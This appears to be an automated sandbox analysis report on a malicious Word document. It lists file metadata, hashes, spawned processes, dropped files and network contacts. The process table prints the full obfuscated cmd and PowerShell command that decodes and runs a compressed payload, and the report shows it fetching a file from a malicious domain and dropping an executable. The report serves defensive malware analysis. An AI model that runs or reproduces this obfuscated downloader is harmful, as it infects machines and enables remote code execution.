File name: | 4_RgNr-N5O4782-33.doc |
Full analysis: | https://app.any.run/tasks/4e3c7caf-4b58-4c29-8e31-09d95dba003c |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 14:50:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Eli-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Nov 12 06:51:00 2018, Last Saved Time/Date: Mon Nov 12 06:51:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 469BBF236645D95A124B8334C2676683 |
SHA1: | 77E0B39C59B4B50AE6B9AA21BEE455EB8291C7AA |
SHA256: | D1FD5301FAA9C42AC954DFDBF5BD4D79A8D569845FF174C08BBCDC3B0D76176F |
SSDEEP: | 1536:pU79ocn1kp59gxBK85fBt+a9Op3pX3M3e99NFHCVzlY1AFnjkW:l41k/W48K3pX3M3e99NFHCVzlY1AFnjk |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:12 06:51:00 |
CreateDate: | 2018:11:12 06:51:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Eli-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
612 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4_RgNr-N5O4782-33.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3816 | CMD /c Cmd /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekOVNI '+'crf)(Dn'+'eoTda'+'ER.)'+'})'+'iI'+'cS'+'A::'+']Gn'+'IDoCNE'+'.txE'+'t'+'.mE'+'T'+'s'+'YS[ , '+'_Q8h'+' '+'(REDA'+'ErmAe'+'r'+'t'+'S.oi '+'TcEJBO-WEn {'+' tC'+'E'+'jBO'+'-hcAe'+'Ro'+'f '+'crf'+' )'+'s'+'SERp'+'M'+'O'+'CED'+'::'+']EdOm'+'NoIS'+'SErp'+'m'+'O'+'c.noiss'+'erPmoc'+'.Oi[, '+')'+'0kR'+'=='+'wf0gt'+'4jn'+'5w'+'plE'+'56'+'j'+'u'+'T6'+'l'+'U'+'y8Thm'+'dN'+'Rp'+'Y'+'bFvu'+'a'+'GcUFpNDv'+'i'+'S'+'aiRLaT3RXf5'+'R62j'+'22Tq'+'8'+'9'+'yO00xFYyxWaA'+'a'+'PAh/'+'+eeB'+'+'+'/PwGy7wuuEMUTe'+'JCm3c'+'7'+'dD'+'D'+'Nv'+'v0E6'+'ly'+'9'+'A'+'B'+'fdSW9'+'xBKUu'+'DeMT4'+'rPe6id'+'+'+'JMV'+'C2TkqV/f'+'x'+'b'+'a'+'Ky+'+'XLxam'+'q1'+'vrVSpZnJ+Z'+'x0HZ5X'+'N+WpMXQhxM5iSysve+L/J+yhlz'+'6Tt'+'VOy'+'g'+'Ahuy'+'KymQon8'+'J'+'cE7vWmI'+'Gm'+'vhI'+'siwMIrg'+'0'+'Ai'+'LMxX10'+'Vyjy'+'TnY'+'G'+'3E'+'wE'+'UCsEZ6yMT'+'sET'+'nT'+'4Jb'+'nj'+'w'+'ELS'+'5UEl2J'+'syPY9iggb2'+'84'+'aR'+'9bW'+'+Q'+'QN/'+'xtcw'+'J7W'+'++e'+'6b'+'C'+'ZcX'+'/QOmbOaruL'+'vV'+'uK9FG'+'UGBKISY'+'Y'+'QtENgqfNb'+'JIFa6hy/XI'+'FwI8TRBZ'+'P0'+'kR '+'(GNiRt'+'s46E'+'SABMorf:'+':]'+'T'+'REvn'+'OC'+'[]MaEr'+'tSy'+'roMe'+'m'+'.oi.METsys'+'['+' '+'(mAERtSE'+'tAlFe'+'D.'+'N'+'OisSErpM'+'o'+'c.Oi'+'.mETsys'+' Tc'+'EJ'+'B'+'O-'+'WEn ( '(( ()''nIOJ-]2,11,3[EmAN.)'*rDM*' eLbAirav-Teg(( ." 
; [ARrAY]::ReveRSE( ( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue); [stRiNG]::jOIn( '' ,( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue )^|^& ( $veRbOsePrEFerENCe.TOsTRiNG()[1,3]+'x'-JOIn'')&& PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1792 | Cmd /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekOVNI '+'crf)(Dn'+'eoTda'+'ER.)'+'})'+'iI'+'cS'+'A::'+']Gn'+'IDoCNE'+'.txE'+'t'+'.mE'+'T'+'s'+'YS[ , '+'_Q8h'+' '+'(REDA'+'ErmAe'+'r'+'t'+'S.oi '+'TcEJBO-WEn {'+' tC'+'E'+'jBO'+'-hcAe'+'Ro'+'f '+'crf'+' )'+'s'+'SERp'+'M'+'O'+'CED'+'::'+']EdOm'+'NoIS'+'SErp'+'m'+'O'+'c.noiss'+'erPmoc'+'.Oi[, '+')'+'0kR'+'=='+'wf0gt'+'4jn'+'5w'+'plE'+'56'+'j'+'u'+'T6'+'l'+'U'+'y8Thm'+'dN'+'Rp'+'Y'+'bFvu'+'a'+'GcUFpNDv'+'i'+'S'+'aiRLaT3RXf5'+'R62j'+'22Tq'+'8'+'9'+'yO00xFYyxWaA'+'a'+'PAh/'+'+eeB'+'+'+'/PwGy7wuuEMUTe'+'JCm3c'+'7'+'dD'+'D'+'Nv'+'v0E6'+'ly'+'9'+'A'+'B'+'fdSW9'+'xBKUu'+'DeMT4'+'rPe6id'+'+'+'JMV'+'C2TkqV/f'+'x'+'b'+'a'+'Ky+'+'XLxam'+'q1'+'vrVSpZnJ+Z'+'x0HZ5X'+'N+WpMXQhxM5iSysve+L/J+yhlz'+'6Tt'+'VOy'+'g'+'Ahuy'+'KymQon8'+'J'+'cE7vWmI'+'Gm'+'vhI'+'siwMIrg'+'0'+'Ai'+'LMxX10'+'Vyjy'+'TnY'+'G'+'3E'+'wE'+'UCsEZ6yMT'+'sET'+'nT'+'4Jb'+'nj'+'w'+'ELS'+'5UEl2J'+'syPY9iggb2'+'84'+'aR'+'9bW'+'+Q'+'QN/'+'xtcw'+'J7W'+'++e'+'6b'+'C'+'ZcX'+'/QOmbOaruL'+'vV'+'uK9FG'+'UGBKISY'+'Y'+'QtENgqfNb'+'JIFa6hy/XI'+'FwI8TRBZ'+'P0'+'kR '+'(GNiRt'+'s46E'+'SABMorf:'+':]'+'T'+'REvn'+'OC'+'[]MaEr'+'tSy'+'roMe'+'m'+'.oi.METsys'+'['+' '+'(mAERtSE'+'tAlFe'+'D.'+'N'+'OisSErpM'+'o'+'c.Oi'+'.mETsys'+' Tc'+'EJ'+'B'+'O-'+'WEn ( '(( ()''nIOJ-]2,11,3[EmAN.)'*rDM*' eLbAirav-Teg(( ." 
; [ARrAY]::ReveRSE( ( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue); [stRiNG]::jOIn( '' ,( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue )^|^& ( $veRbOsePrEFerENCe.TOsTRiNG()[1,3]+'x'-JOIn'')&& PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) )" | C:\Windows\system32\cmd.exe | — | CMD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2104 | PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1360 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 255 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
612 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5C73.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\811L7QKX2CMYS4OTX88M.temp | — | |
MD5:— | SHA256:— | |||
1360 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs7386.tmp | — | |
MD5:— | SHA256:— | |||
1360 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs7396.tmp | — | |
MD5:— | SHA256:— | |||
2104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
612 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$RgNr-N5O4782-33.doc | pgc | |
MD5:29353B7716ADF3DCF88EEC19942BE3F5 | SHA256:612AF684941F1C82498646B34CA9ABCF815F8F97AC4E660C5D4545C661423BBA | |||
612 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:825C45DD10C96600B19CB23B108C989D | SHA256:7C821062FDC859ADBA6F62E919301188567AB7912FBA2458B8EC3C72FE0F88DB | |||
2104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe6a00.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2104 | powershell.exe | C:\Users\admin\AppData\Local\Temp\431.exe | html | |
MD5:AFC83AE7C4EA82B533D9B8731AAB3E80 | SHA256:FDF900267092BC67BD7786B86C462E69F9ED52BED838809B6BA28B298BE879F6 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2104 | powershell.exe | GET | 302 | 143.95.78.251:80 | http://craniofacialhealth.com/fkwoBvLXu9 | US | html | 239 b | malicious |
2104 | powershell.exe | GET | 200 | 143.95.78.251:80 | http://craniofacialhealth.com/cgi-sys/suspendedpage.cgi | US | html | 7.12 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2104 | powershell.exe | 143.95.78.251:80 | craniofacialhealth.com | Colo4, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
craniofacialhealth.com | | malicious |